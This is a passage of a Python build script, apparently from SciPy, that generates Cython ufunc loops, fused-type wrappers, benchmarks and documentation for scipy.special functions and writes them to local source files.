'l': 'NPY_LONG',
}
CYTHON_SPECIAL_BENCHFUNCS = {
'airy': ['d*dddd', 'D*DDDD'],
'beta': ['dd'],
'erf': ['d', 'D'],
'exprel': ['d'],
'gamma': ['d', 'D'],
'jv': ['dd', 'dD'],
'loggamma': ['D'],
'logit': ['d'],
'psi': ['d', 'D'],
}
def underscore(arg):
return arg.replace(" ", "_")
def cast_order(c):
return ['ilfdgFDG'.index(x) for x in c]
# These downcasts will cause the function to return NaNs, unless the
# values happen to coincide exactly.
DANGEROUS_DOWNCAST = set([
('F', 'i'), ('F', 'l'), ('F', 'f'), ('F', 'd'), ('F', 'g'),
('D', 'i'), ('D', 'l'), ('D', 'f'), ('D', 'd'), ('D', 'g'),
('G', 'i'), ('G', 'l'), ('G', 'f'), ('G', 'd'), ('G', 'g'),
('f', 'i'), ('f', 'l'),
('d', 'i'), ('d', 'l'),
('g', 'i'), ('g', 'l'),
('l', 'i'),
])
NAN_VALUE = {
'f': 'NAN',
'd': 'NAN',
'g': 'NAN',
'F': 'NAN',
'D': 'NAN',
'G': 'NAN',
'i': '0xbad0bad0',
'l': '0xbad0bad0',
}
def generate_loop(func_inputs, func_outputs, func_retval,
ufunc_inputs, ufunc_outputs):
"""
Generate a UFunc loop function that calls a function given as its
data parameter with the specified input and output arguments and
return value.
This function can be passed to PyUFunc_FromFuncAndData.
Parameters
----------
func_inputs, func_outputs, func_retval : str
Signature of the function to call, given as type codes of the
input, output and return value arguments. These 1-character
codes are given according to the CY_TYPES and TYPE_NAMES
lists above.
The corresponding C function signature to be called is:
retval func(intype1 iv1, intype2 iv2, ..., outtype1 *ov1, ...);
If len(ufunc_outputs) == len(func_outputs)+1, the return value
is treated as the first output argument. Otherwise, the return
value is ignored.
ufunc_inputs, ufunc_outputs : str
Ufunc input and output signature.
This does not have to exactly match the function signature,
as long as the type casts work out on the C level.
Returns
-------
loop_name
Name of the generated loop function.
loop_body
Generated C code for the loop.
"""
if len(func_inputs) != len(ufunc_inputs):
raise ValueError("Function and ufunc have different number of inputs")
if len(func_outputs) != len(ufunc_outputs) and not (
func_retval != "v" and len(func_outputs)+1 == len(ufunc_outputs)):
raise ValueError("Function retval and ufunc outputs don't match")
name = "loop_%s_%s_%s_As_%s_%s" % (
func_retval, func_inputs, func_outputs, ufunc_inputs, ufunc_outputs
)
body = "cdef void %s(char **args, np.npy_intp *dims, np.npy_intp *steps, void *data) nogil:\n" % name
body += " cdef np.npy_intp i, n = dims[0]\n"
body += " cdef void *func = (<void**>data)[0]\n"
body += " cdef char *func_name = <char*>(<void**>data)[1]\n"
for j in range(len(ufunc_inputs)):
body += " cdef char *ip%d = args[%d]\n" % (j, j)
for j in range(len(ufunc_outputs)):
body += " cdef char *op%d = args[%d]\n" % (j, j + len(ufunc_inputs))
ftypes = []
fvars = []
outtypecodes = []
for j in range(len(func_inputs)):
ftypes.append(CY_TYPES[func_inputs[j]])
fvars.append("<%s>(<%s*>ip%d)[0]" % (
CY_TYPES[func_inputs[j]],
CY_TYPES[ufunc_inputs[j]], j))
if len(func_outputs)+1 == len(ufunc_outputs):
func_joff = 1
outtypecodes.append(func_retval)
body += " cdef %s ov0\n" % (CY_TYPES[func_retval],)
else:
func_joff = 0
for j, outtype in enumerate(func_outputs):
body += " cdef %s ov%d\n" % (CY_TYPES[outtype], j+func_joff)
ftypes.append("%s *" % CY_TYPES[outtype])
fvars.append("&ov%d" % (j+func_joff))
outtypecodes.append(outtype)
body += " for i in range(n):\n"
if len(func_outputs)+1 == len(ufunc_outputs):
rv = "ov0 = "
else:
rv = ""
funcall = " %s(<%s(*)(%s) nogil>func)(%s)\n" % (
rv, CY_TYPES[func_retval], ", ".join(ftypes), ", ".join(fvars))
# Cast-check inputs and call function
input_checks = []
for j in range(len(func_inputs)):
if (ufunc_inputs[j], func_inputs[j]) in DANGEROUS_DOWNCAST:
chk = "<%s>(<%s*>ip%d)[0] == (<%s*>ip%d)[0]" % (
CY_TYPES[func_inputs[j]], CY_TYPES[ufunc_inputs[j]], j,
CY_TYPES[ufunc_inputs[j]], j)
input_checks.append(chk)
if input_checks:
body += " if %s:\n" % (" and ".join(input_checks))
body += " " + funcall
body += " else:\n"
body += " sf_error.error(func_name, sf_error.DOMAIN, \"invalid input argument\")\n"
for j, outtype in enumerate(outtypecodes):
body += " ov%d = <%s>%s\n" % (
j, CY_TYPES[outtype], NAN_VALUE[outtype])
else:
body += funcall
# Assign and cast-check output values
for j, (outtype, fouttype) in enumerate(zip(ufunc_outputs, outtypecodes)):
if (fouttype, outtype) in DANGEROUS_DOWNCAST:
body += " if ov%d == <%s>ov%d:\n" % (j, CY_TYPES[outtype], j)
body += " (<%s *>op%d)[0] = <%s>ov%d\n" % (
CY_TYPES[outtype], j, CY_TYPES[outtype], j)
body += " else:\n"
body += " sf_error.error(func_name, sf_error.DOMAIN, \"invalid output\")\n"
body += " (<%s *>op%d)[0] = <%s>%s\n" % (
CY_TYPES[outtype], j, CY_TYPES[outtype], NAN_VALUE[outtype])
else:
body += " (<%s *>op%d)[0] = <%s>ov%d\n" % (
CY_TYPES[outtype], j, CY_TYPES[outtype], j)
for j in range(len(ufunc_inputs)):
body += " ip%d += steps[%d]\n" % (j, j)
for j in range(len(ufunc_outputs)):
body += " op%d += steps[%d]\n" % (j, j + len(ufunc_inputs))
body += " sf_error.check_fpe(func_name)\n"
return name, body
def generate_fused_type(codes):
"""
Generate name of and cython code for a fused type.
Parameters
----------
codes : str
Valid inputs to CY_TYPES (i.e. f, d, g, ...).
"""
cytypes = [CY_TYPES[x] for x in codes]
name = codes + "_number_t"
declaration = ["ctypedef fused " + name + ":"]
for cytype in cytypes:
declaration.append(" " + cytype)
declaration = "\n".join(declaration)
return name, declaration
def generate_bench(name, codes):
tab = " "*4
top, middle, end = [], [], []
tmp = codes.split("*")
if len(tmp) > 1:
incodes = tmp[0]
outcodes = tmp[1]
else:
incodes = tmp[0]
outcodes = ""
inargs, inargs_and_types = [], []
for n, code in enumerate(incodes):
arg = "x{}".format(n)
inargs.append(arg)
inargs_and_types.append("{} {}".format(CY_TYPES[code], arg))
line = "def {{}}(int N, {}):".format(", ".join(inargs_and_types))
top.append(line)
top.append(tab + "cdef int n")
outargs = []
for n, code in enumerate(outcodes):
arg = "y{}".format(n)
outargs.append("&{}".format(arg))
line = "cdef {} {}".format(CY_TYPES[code], arg)
middle.append(tab + line)
end.append(tab + "for n in range(N):")
end.append(2*tab + "{}({})")
pyfunc = "_bench_{}_{}_{}".format(name, incodes, "py")
cyfunc = "_bench_{}_{}_{}".format(name, incodes, "cy")
pytemplate = "\n".join(top + end)
cytemplate = "\n".join(top + middle + end)
pybench = pytemplate.format(pyfunc, "_ufuncs." + name, ", ".join(inargs))
cybench = cytemplate.format(cyfunc, name, ", ".join(inargs + outargs))
return pybench, cybench
def generate_doc(name, specs):
tab = " "*4
doc = ["- :py:func:`~scipy.special.{}`::\n".format(name)]
for spec in specs:
incodes, outcodes = spec.split("->")
incodes = incodes.split("*")
intypes = [CY_TYPES[x] for x in incodes[0]]
if len(incodes) > 1:
types = [f"{CY_TYPES[x]} *" for x in incodes[1]]
intypes.extend(types)
outtype = CY_TYPES[outcodes]
line = "{} {}({})".format(outtype, name, ", ".join(intypes))
doc.append(2*tab + line)
doc[-1] = "{}\n".format(doc[-1])
doc = "\n".join(doc)
return doc
def npy_cdouble_from_double_complex(var):
"""Cast a Cython double complex to a NumPy cdouble."""
res = "_complexstuff.npy_cdouble_from_double_complex({})".format(var)
return res
def double_complex_from_npy_cdouble(var):
"""Cast a NumPy cdouble to a Cython double complex."""
res = "_complexstuff.double_complex_from_npy_cdouble({})".format(var)
return res
def iter_variants(inputs, outputs):
"""
Generate variants of UFunc signatures, by changing variable types,
within the limitation that the corresponding C types casts still
work out.
This does not generate all possibilities, just the ones required
for the ufunc to work properly with the most common data types.
Parameters
----------
inputs, outputs : str
UFunc input and output signature strings
Yields
------
new_input, new_output : str
Modified input and output strings.
Also the original input/output pair is yielded.
"""
maps = [
# always use long instead of int (more common type on 64-bit)
('i', 'l'),
]
# float32-preserving signatures
if not ('i' in inputs or 'l' in inputs):
# Don't add float32 versions of ufuncs with integer arguments, as this
# can lead to incorrect dtype selection if the integer arguments are
# arrays, but float arguments are scalars.
# For instance sph_harm(0,[0],0,0).dtype == complex64
# This may be a NumPy bug, but we need to work around it.
# cf. gh-4895, https://github.com/numpy/numpy/issues/5895
maps = maps + [(a + 'dD', b + 'fF') for a, b in maps]
# do the replacements
for src, dst in maps:
new_inputs = inputs
new_outputs = outputs
for a, b in zip(src, dst):
new_inputs = new_inputs.replace(a, b)
new_outputs = new_outputs.replace(a, b)
yield new_inputs, new_outputs
class Func:
"""
Base class for Ufunc and FusedFunc.
"""
def __init__(self, name, signatures):
self.name = name
self.signatures = []
self.function_name_overrides = {}
for header in signatures.keys():
for name, sig in signatures[header].items():
inarg, outarg, ret = self._parse_signature(sig)
self.signatures.append((name, inarg, outarg, ret, header))
def _parse_signature(self, sig):
m = re.match(r"\s*([fdgFDGil]*)\s*\*\s*([fdgFDGil]*)\s*->\s*([*fdgFDGil]*)\s*$", sig)
if m:
inarg, outarg, ret = [x.strip() for x in m.groups()]
if ret.count('*') > 1:
raise ValueError("{}: Invalid signature: {}".format(self.name, sig))
return inarg, outarg, ret
m = re.match(r"\s*([fdgFDGil]*)\s*->\s*([fdgFDGil]?)\s*$", sig)
if m:
inarg, ret = [x.strip() for x in m.groups()]
return inarg, "", ret
raise ValueError("{}: Invalid signature: {}".format(self.name, sig))
def get_prototypes(self, nptypes_for_h=False):
prototypes = []
for func_name, inarg, outarg, ret, header in self.signatures:
ret = ret.replace('*', '')
c_args = ([C_TYPES[x] for x in inarg]
+ [C_TYPES[x] + ' *' for x in outarg])
cy_args = ([CY_TYPES[x] for x in inarg]
+ [CY_TYPES[x] + ' *' for x in outarg])
c_proto = "%s (*)(%s)" % (C_TYPES[ret], ", ".join(c_args))
if header.endswith("h") and nptypes_for_h:
cy_proto = c_proto + "nogil"
else:
cy_proto = "%s (*)(%s) nogil" % (CY_TYPES[ret], ", ".join(cy_args))
prototypes.append((func_name, c_proto, cy_proto, header))
return prototypes
def cython_func_name(self, c_name, specialized=False, prefix="_func_",
override=True):
# act on function name overrides
if override and c_name in self.function_name_overrides:
c_name = self.function_name_overrides[c_name]
prefix = ""
# support fused types
m = re.match(r'^(.*?)(\[.*\])$', c_name)
if m:
c_base_name, fused_part = m.groups()
else:
c_base_name, fused_part = c_name, ""
if specialized:
return "%s%s%s" % (prefix, c_base_name, fused_part.replace(' ', '_'))
else:
return "%s%s" % (prefix, c_base_name,)
class Ufunc(Func):
"""
Ufunc signature, restricted format suitable for special functions.
Parameters
----------
name
Name of the ufunc to create
signature
String of form 'func: fff*ff->f, func2: ddd->*i' describing
the C-level functions and types of their input arguments
and return values.
The syntax is 'function_name: inputparams*outputparams->output_retval*ignored_retval'
Attributes
----------
name : str
Python name for the Ufunc
signatures : list of (func_name, inarg_spec, outarg_spec, ret_spec, header_name)
List of parsed signatures
doc : str
Docstring, obtained from add_newdocs
function_name_overrides : dict of str->str
Overrides for the function names in signatures
"""
def __init__(self, name, signatures):
super().__init__(name, signatures)
self.doc = add_newdocs.get(name)
if self.doc is None:
raise ValueError("No docstring for ufunc %r" % name)
self.doc = textwrap.dedent(self.doc).strip()
def _get_signatures_and_loops(self, all_loops):
inarg_num = None
outarg_num = None
seen = set()
variants = []
def add_variant(func_name, inarg, outarg, ret, inp, outp):
if inp in seen:
return
seen.add(inp)
sig = (func_name, inp, outp)
if "v" in outp:
raise ValueError("%s: void signature %r" % (self.name, sig))
if len(inp) != inarg_num or len(outp) != outarg_num:
raise ValueError("%s: signature %r does not have %d/%d input/output args" % (
self.name, sig,
inarg_num, outarg_num))
loop_name, loop = generate_loop(inarg, outarg, ret, inp, outp)
all_loops[loop_name] = loop
variants.append((func_name, loop_name, inp, outp))
# First add base variants
for func_name, inarg, outarg, ret, header in self.signatures:
outp = re.sub(r'\*.*', '', ret) + outarg
ret = ret.replace('*', '')
if inarg_num is None:
inarg_num = len(inarg)
outarg_num = len(outp)
inp, outp = list(iter_variants(inarg, outp))[0]
add_variant(func_name, inarg, outarg, ret, inp, outp)
# Then the supplementary ones
for func_name, inarg, outarg, ret, header in self.signatures:
outp = re.sub(r'\*.*', '', ret) + outarg
ret = ret.replace('*', '')
for inp, outp in iter_variants(inarg, outp):
add_variant(func_name, inarg, outarg, ret, inp, outp)
# Then sort variants to input argument cast order
# -- the sort is stable, so functions earlier in the signature list
# are still preferred
variants.sort(key=lambda v: cast_order(v[2]))
return variants, inarg_num, outarg_num
def generate(self, all_loops):
toplevel = ""
variants, inarg_num, outarg_num = self._get_signatures_and_loops(
all_loops)
loops = []
funcs = []
types = []
for func_name, loop_name, inputs, outputs in variants:
for x in inputs:
types.append(TYPE_NAMES[x])
for x in outputs:
types.append(TYPE_NAMES[x])
loops.append(loop_name)
funcs.append(func_name)
toplevel += "cdef np.PyUFuncGenericFunction ufunc_%s_loops[%d]\n" % (self.name, len(loops))
toplevel += "cdef void *ufunc_%s_ptr[%d]\n" % (self.name, 2*len(funcs))
toplevel += "cdef void *ufunc_%s_data[%d]\n" % (self.name, len(funcs))
toplevel += "cdef char ufunc_%s_types[%d]\n" % (self.name, len(types))
toplevel += 'cdef char *ufunc_%s_doc = (\n "%s")\n' % (
self.name,
self.doc.replace("\\", "\\\\").replace('"', '\\"').replace('\n', '\\n\"\n "')
)
for j, function in enumerate(loops):
toplevel += "ufunc_%s_loops[%d] = <np.PyUFuncGenericFunction>%s\n" % (self.name, j, function)
for j, type in enumerate(types):
toplevel += "ufunc_%s_types[%d] = <char>%s\n" % (self.name, j, type)
for j, func in enumerate(funcs):
toplevel += "ufunc_%s_ptr[2*%d] = <void*>%s\n" % (self.name, j,
self.cython_func_name(func, specialized=True))
toplevel += "ufunc_%s_ptr[2*%d+1] = <void*>(<char*>\"%s\")\n" % (self.name, j,
self.name)
for j, func in enumerate(funcs):
toplevel += "ufunc_%s_data[%d] = &ufunc_%s_ptr[2*%d]\n" % (
self.name, j, self.name, j)
toplevel += ('@ = np.PyUFunc_FromFuncAndData(ufunc_@_loops, '
'ufunc_@_data, ufunc_@_types, %d, %d, %d, 0, '
'"@", ufunc_@_doc, 0)\n' % (len(types)/(inarg_num+outarg_num),
inarg_num, outarg_num)
).replace('@', self.name)
return toplevel
class FusedFunc(Func):
"""
Generate code for a fused-type special function that can be
cimported in Cython.
"""
def __init__(self, name, signatures):
super().__init__(name, signatures)
self.doc = "See the documentation for scipy.special." + self.name
# "codes" are the keys for CY_TYPES
self.incodes, self.outcodes = self._get_codes()
self.fused_types = set()
self.intypes, infused_types = self._get_types(self.incodes)
self.fused_types.update(infused_types)
self.outtypes, outfused_types = self._get_types(self.outcodes)
self.fused_types.update(outfused_types)
self.invars, self.outvars = self._get_vars()
def _get_codes(self):
inarg_num, outarg_num = None, None
all_inp, all_outp = [], []
for _, inarg, outarg, ret, _ in self.signatures:
outp = re.sub(r'\*.*', '', ret) + outarg
if inarg_num is None:
inarg_num = len(inarg)
outarg_num = len(outp)
inp, outp = list(iter_variants(inarg, outp))[0]
all_inp.append(inp)
all_outp.append(outp)
incodes = []
for n in range(inarg_num):
codes = unique([x[n] for x in all_inp])
codes.sort()
incodes.append(''.join(codes))
outcodes = []
for n in range(outarg_num):
codes = unique([x[n] for x in all_outp])
codes.sort()
outcodes.append(''.join(codes))
return tuple(incodes), tuple(outcodes)
def _get_types(self, codes):
all_types = []
fused_types = set()
for code in codes:
if len(code) == 1:
# It's not a fused type
all_types.append((CY_TYPES[code], code))
else:
# It's a fused type
fused_type, dec = generate_fused_type(code)
fused_types.add(dec)
all_types.append((fused_type, code))
return all_types, fused_types
def _get_vars(self):
invars = ["x{}".format(n) for n in range(len(self.intypes))]
outvars = ["y{}".format(n) for n in range(len(self.outtypes))]
return invars, outvars
def _get_conditional(self, types, codes, adverb):
"""Generate an if/elif/else clause that selects a specialization of
fused types.
"""
clauses = []
seen = set()
for (typ, typcode), code in zip(types, codes):
if len(typcode) == 1:
continue
if typ not in seen:
clauses.append(f"{typ} is {underscore(CY_TYPES[code])}")
seen.add(typ)
if clauses and adverb != "else":
line = "{} {}:".format(adverb, " and ".join(clauses))
elif clauses and adverb == "else":
line = "else:"
else:
line = None
return line
def _get_incallvars(self, intypes, c):
"""Generate pure input variables to a specialization,
i.e., variables that aren't used to return a value.
"""
incallvars = []
for n, intype in enumerate(intypes):
var = self.invars[n]
if c and intype == "double complex":
var = npy_cdouble_from_double_complex(var)
incallvars.append(var)
return incallvars
def _get_outcallvars(self, outtypes, c):
"""Generate output variables to a specialization,
i.e., pointers that are used to return values.
"""
outcallvars, tmpvars, casts = [], [], []
# If there are more out variables than out types, we want the
# tail of the out variables
start = len(self.outvars) - len(outtypes)
outvars = self.outvars[start:]
for n, (var, outtype) in enumerate(zip(outvars, outtypes)):
if c and outtype == "double complex":
tmp = "tmp{}".format(n)
tmpvars.append(tmp)
outcallvars.append("&{}".format(tmp))
tmpcast = double_complex_from_npy_cdouble(tmp)
casts.append("{}[0] = {}".format(var, tmpcast))
else:
outcallvars.append("{}".format(var))
return outcallvars, tmpvars, casts
def _get_nan_decs(self):
"""Set all variables to nan for specializations of fused types for
which don't have signatures.
"""
# Set non fused-type variables to nan
tab = " "*4
fused_types, lines = [], [tab + "else:"]
seen = set()
for outvar, outtype, code in zip(self.outvars, self.outtypes,
self.outcodes):
if len(code) == 1:
line = "{}[0] = {}".format(outvar, NAN_VALUE[code])
lines.append(2*tab + line)
else:
fused_type = outtype
name, _ = fused_type
if name not in seen:
fused_types.append(fused_type)
seen.add(name)
if not fused_types:
return lines
# Set fused-type variables to nan
all_codes = tuple([codes for _unused, codes in fused_types])
codelens = [len(x) for x in all_codes]
last = numpy.prod(codelens) - 1
for m, codes in enumerate(itertools.product(*all_codes)):
fused_codes, decs = [], []
for n, fused_type in enumerate(fused_types):
code = codes[n]
fused_codes.append(underscore(CY_TYPES[code]))
for nn, outvar in enumerate(self.outvars):
if self.outtypes[nn] == fused_type:
line = "{}[0] = {}".format(outvar, NAN_VALUE[code])
decs.append(line)
if m == 0:
adverb = "if"
elif m == last:
adverb = "else"
else:
adverb = "elif"
cond = self._get_conditional(fused_types, codes, adverb)
lines.append(2*tab + cond)
lines.extend([3*tab + x for x in decs])
return lines
def _get_tmp_decs(self, all_tmpvars):
"""Generate the declarations of any necessary temporary
variables.
"""
tab = " "*4
tmpvars = list(all_tmpvars)
tmpvars.sort()
tmpdecs = [tab + "cdef npy_cdouble {}".format(tmpvar)
for tmpvar in tmpvars]
return tmpdecs
def _get_python_wrap(self):
"""Generate a Python wrapper for functions which pass their
arguments as pointers.
"""
tab = " "*4
body, callvars = [], []
for (intype, _), invar in zip(self.intypes, self.invars):
callvars.append("{} {}".format(intype, invar))
line = "def _{}_pywrap({}):".format(self.name, ", ".join(callvars))
body.append(line)
for (outtype, _), outvar in zip(self.outtypes, self.outvars):
line = "cdef {} {}".format(outtype, outvar)
body.append(tab + line)
addr_outvars = [f"&{x}" for x in self.outvars]
line = "{}({}, {})".format(self.name, ", ".join(self.invars),
", ".join(addr_outvars))
body.append(tab + line)
line = "return {}".format(", ".join(self.outvars))
body.append(tab + line)
body = "\n".join(body)
return body
def _get_common(self, signum, sig):
"""Generate code common to all the _generate_* methods."""
tab = " "*4
func_name, incodes, outcodes, retcode, header = sig
# Convert ints to longs; cf. iter_variants()
incodes = incodes.replace('i', 'l')
outcodes = outcodes.replace('i', 'l')
retcode = retcode.replace('i', 'l')
if header.endswith("h"):
c = True
else:
c = False
if header.endswith("++"):
cpp = True
else:
cpp = False
intypes = [CY_TYPES[x] for x in incodes]
outtypes = [CY_TYPES[x] for x in outcodes]
retcode = re.sub(r'\*.*', '', retcode)
if not retcode:
retcode = 'v'
rettype = CY_TYPES[retcode]
if cpp:
# Functions from _ufuncs_cxx are exported as a void*
# pointers; cast them to the correct types
func_name = "scipy.special._ufuncs_cxx._export_{}".format(func_name)
func_name = "(<{}(*)({}) nogil>{})"\
.format(rettype, ", ".join(intypes + outtypes), func_name)
else:
func_name = self.cython_func_name(func_name, specialized=True)
if signum == 0:
adverb = "if"
else:
adverb = "elif"
cond = self._get_conditional(self.intypes, incodes, adverb)
if cond:
lines = [tab + cond]
sp = 2*tab
else:
lines = []
sp = tab
return func_name, incodes, outcodes, retcode, \
intypes, outtypes, rettype, c, lines, sp
def _generate_from_return_and_no_outargs(self):
tab = " "*4
specs, body = [], []
for signum, sig in enumerate(self.signatures):
func_name, incodes, outcodes, retcode, intypes, outtypes, \
rettype, c, lines, sp = self._get_common(signum, sig)
body.extend(lines)
# Generate the call to the specialized function
callvars = self._get_incallvars(intypes, c)
call = "{}({})".format(func_name, ", ".join(callvars))
if c and rettype == "double complex":
call = double_complex_from_npy_cdouble(call)
line = sp + "return {}".format(call)
body.append(line)
sig = "{}->{}".format(incodes, retcode)
specs.append(sig)
if len(specs) > 1:
# Return nan for signatures without a specialization
body.append(tab + "else:")
outtype, outcodes = self.outtypes[0]
last = len(outcodes) - 1
if len(outcodes) == 1:
line = "return {}".format(NAN_VALUE[outcodes])
body.append(2*tab + line)
else:
for n, code in enumerate(outcodes):
if n == 0:
adverb = "if"
elif n == last:
adverb = "else"
else:
adverb = "elif"
cond = self._get_conditional(self.outtypes, code, adverb)
body.append(2*tab + cond)
line = "return {}".format(NAN_VALUE[code])
body.append(3*tab + line)
# Generate the head of the function
callvars, head = [], []
for n, (intype, _) in enumerate(self.intypes):
callvars.append("{} {}".format(intype, self.invars[n]))
(outtype, _) = self.outtypes[0]
dec = "cpdef {} {}({}) nogil".format(outtype, self.name, ", ".join(callvars))
head.append(dec + ":")
head.append(tab + '"""{}"""'.format(self.doc))
src = "\n".join(head + body)
return dec, src, specs
def _generate_from_outargs_and_no_return(self):
tab = " "*4
all_tmpvars = set()
specs, body = [], []
for signum, sig in enumerate(self.signatures):
func_name, incodes, outcodes, retcode, intypes, outtypes, \
rettype, c, lines, sp = self._get_common(signum, sig)
body.extend(lines)
# Generate the call to the specialized function
callvars = self._get_incallvars(intypes, c)
outcallvars, tmpvars, casts = self._get_outcallvars(outtypes, c)
callvars.extend(outcallvars)
all_tmpvars.update(tmpvars)
call = "{}({})".format(func_name, ", ".join(callvars))
body.append(sp + call)
body.extend([sp + x for x in casts])
if len(outcodes) == 1:
sig = "{}->{}".format(incodes, outcodes)
specs.append(sig)
else:
sig = "{}*{}->v".format(incodes, outcodes)
specs.append(sig)
if len(specs) > 1:
lines = self._get_nan_decs()
body.extend(lines)
if len(self.outvars) == 1:
line = "return {}[0]".format(self.outvars[0])
body.append(tab + line)
# Generate the head of the function
callvars, head = [], []
for invar, (intype, _) in zip(self.invars, self.intypes):
callvars.append("{} {}".format(intype, invar))
if len(self.outvars) > 1:
for outvar, (outtype, _) in zip(self.outvars, self.outtypes):
callvars.append("{} *{}".format(outtype, outvar))
if len(self.outvars) == 1:
outtype, _ = self.outtypes[0]
dec = "cpdef {} {}({}) nogil".format(outtype, self.name, ", ".join(callvars))
else:
dec = "cdef void {}({}) nogil".format(self.name, ", ".join(callvars))
head.append(dec + ":")
head.append(tab + '"""{}"""'.format(self.doc))
if len(self.outvars) == 1:
outvar = self.outvars[0]
outtype, _ = self.outtypes[0]
line = "cdef {} {}".format(outtype, outvar)
head.append(tab + line)
head.extend(self._get_tmp_decs(all_tmpvars))
src = "\n".join(head + body)
return dec, src, specs
def _generate_from_outargs_and_return(self):
tab = " "*4
all_tmpvars = set()
specs, body = [], []
for signum, sig in enumerate(self.signatures):
func_name, incodes, outcodes, retcode, intypes, outtypes, \
rettype, c, lines, sp = self._get_common(signum, sig)
body.extend(lines)
# Generate the call to the specialized function
callvars = self._get_incallvars(intypes, c)
outcallvars, tmpvars, casts = self._get_outcallvars(outtypes, c)
callvars.extend(outcallvars)
all_tmpvars.update(tmpvars)
call = "{}({})".format(func_name, ", ".join(callvars))
if c and rettype == "double complex":
call = double_complex_from_npy_cdouble(call)
call = "{}[0] = {}".format(self.outvars[0], call)
body.append(sp + call)
body.extend([sp + x for x in casts])
sig = "{}*{}->v".format(incodes, outcodes + retcode)
specs.append(sig)
if len(specs) > 1:
lines = self._get_nan_decs()
body.extend(lines)
# Generate the head of the function
callvars, head = [], []
for invar, (intype, _) in zip(self.invars, self.intypes):
callvars.append("{} {}".format(intype, invar))
for outvar, (outtype, _) in zip(self.outvars, self.outtypes):
callvars.append("{} *{}".format(outtype, outvar))
dec = "cdef void {}({}) nogil".format(self.name, ", ".join(callvars))
head.append(dec + ":")
head.append(tab + '"""{}"""'.format(self.doc))
head.extend(self._get_tmp_decs(all_tmpvars))
src = "\n".join(head + body)
return dec, src, specs
def generate(self):
_, _, outcodes, retcode, _ = self.signatures[0]
retcode = re.sub(r'\*.*', '', retcode)
if not retcode:
retcode = 'v'
if len(outcodes) == 0 and retcode != 'v':
dec, src, specs = self._generate_from_return_and_no_outargs()
elif len(outcodes) > 0 and retcode == 'v':
dec, src, specs = self._generate_from_outargs_and_no_return()
elif len(outcodes) > 0 and retcode != 'v':
dec, src, specs = self._generate_from_outargs_and_return()
else:
raise ValueError("Invalid signature")
if len(self.outvars) > 1:
wrap = self._get_python_wrap()
else:
wrap = None
return dec, src, specs, self.fused_types, wrap
def get_declaration(ufunc, c_name, c_proto, cy_proto, header,
proto_h_filename):
"""
Construct a Cython declaration of a function coming either from a
pxd or a header file. Do sufficient tricks to enable compile-time
type checking against the signature expected by the ufunc.
"""
defs = []
defs_h = []
var_name = c_name.replace('[', '_').replace(']', '_').replace(' ', '_')
if header.endswith('.pxd'):
defs.append("from .%s cimport %s as %s" % (
header[:-4], ufunc.cython_func_name(c_name, prefix=""),
ufunc.cython_func_name(c_name)))
# check function signature at compile time
proto_name = '_proto_%s_t' % var_name
defs.append("ctypedef %s" % (cy_proto.replace('(*)', proto_name)))
defs.append("cdef %s *%s_var = &%s" % (
proto_name, proto_name, ufunc.cython_func_name(c_name, specialized=True)))
else:
# redeclare the function, so that the assumed
# signature is checked at compile time
new_name = "%s \"%s\"" % (ufunc.cython_func_name(c_name), c_name)
defs.append(f'cdef extern from r"{proto_h_filename}":')
defs.append(" cdef %s" % (cy_proto.replace('(*)', new_name)))
defs_h.append(f'#include "{header}"')
defs_h.append("%s;" % (c_proto.replace('(*)', c_name)))
return defs, defs_h, var_name
def generate_ufuncs(fn_prefix, cxx_fn_prefix, ufuncs):
filename = fn_prefix + ".pyx"
proto_h_filename = fn_prefix + '_defs.h'
cxx_proto_h_filename = cxx_fn_prefix + '_defs.h'
cxx_pyx_filename = cxx_fn_prefix + ".pyx"
cxx_pxd_filename = cxx_fn_prefix + ".pxd"
toplevel = ""
# for _ufuncs*
defs = []
defs_h = []
all_loops = {}
# for _ufuncs_cxx*
cxx_defs = []
cxx_pxd_defs = [
"from . cimport sf_error",
"cdef void _set_action(sf_error.sf_error_t, sf_error.sf_action_t) nogil"
]
cxx_defs_h = []
ufuncs.sort(key=lambda u: u.name)
for ufunc in ufuncs:
# generate function declaration and type checking snippets
cfuncs = ufunc.get_prototypes()
for c_name, c_proto, cy_proto, header in cfuncs:
if header.endswith('++'):
header = header[:-2]
# for the CXX module
item_defs, item_defs_h, var_name = get_declaration(ufunc, c_name, c_proto, cy_proto,
header, cxx_proto_h_filename)
cxx_defs.extend(item_defs)
cxx_defs_h.extend(item_defs_h)
cxx_defs.append("cdef void *_export_%s = <void*>%s" % (
var_name, ufunc.cython_func_name(c_name, specialized=True, override=False)))
cxx_pxd_defs.append("cdef void *_export_%s" % (var_name,))
# let cython grab the function pointer from the c++ shared library
ufunc.function_name_overrides[c_name] = "scipy.special._ufuncs_cxx._export_" + var_name
else:
# usual case
item_defs, item_defs_h, _ = get_declaration(ufunc, c_name, c_proto, cy_proto, header,
proto_h_filename)
defs.extend(item_defs)
defs_h.extend(item_defs_h)
# ufunc creation code snippet
t = ufunc.generate(all_loops)
toplevel += t + "\n"
# Produce output
toplevel = "\n".join(sorted(all_loops.values()) + defs + [toplevel])
# Generate an `__all__` for the module
all_ufuncs = (
[
"'{}'".format(ufunc.name)
for ufunc in ufuncs if not ufunc.name.startswith('_')
]
+ ["'geterr'", "'seterr'", "'errstate'", "'jn'"]
)
module_all = '__all__ = [{}]'.format(', '.join(all_ufuncs))
with open(filename, 'w') as f:
f.write(UFUNCS_EXTRA_CODE_COMMON)
f.write(UFUNCS_EXTRA_CODE)
f.write(module_all)
f.write("\n")
f.write(toplevel)
f.write(UFUNCS_EXTRA_CODE_BOTTOM)
defs_h = unique(defs_h)
with open(proto_h_filename, 'w') as f:
f.write("#ifndef UFUNCS_PROTO_H\n#define UFUNCS_PROTO_H 1\n")
f.write("\n".join(defs_h))
f.write("\n#endif\n")
cxx_defs_h = unique(cxx_defs_h)
with open(cxx_proto_h_filename, 'w') as f:
f.write("#ifndef UFUNCS_PROTO_H\n#define UFUNCS_PROTO_H 1\n")
f.write("\n".join(cxx_defs_h))
f.write("\n#endif\n")
with open(cxx_pyx_filename, 'w') as f:
f.write(UFUNCS_EXTRA_CODE_COMMON)
f.write("\n")
f.write("\n".join(cxx_defs))
f.write("\n# distutils: language = c++\n")
with open(cxx_pxd_filename, 'w') as f:
f.write("\n".join(cxx_pxd_defs))
def generate_fused_funcs(modname, ufunc_fn_prefix, fused_funcs):
pxdfile = modname + ".pxd"
pyxfile = modname + ".pyx"
proto_h_filename = ufunc_fn_prefix + '_defs.h'
sources = []
declarations = []
# Code for benchmarks
bench_aux = []
fused_types = set()
# Parameters for the tests
doc = []
defs = []
for func in fused_funcs:
if func.name.startswith("_"):
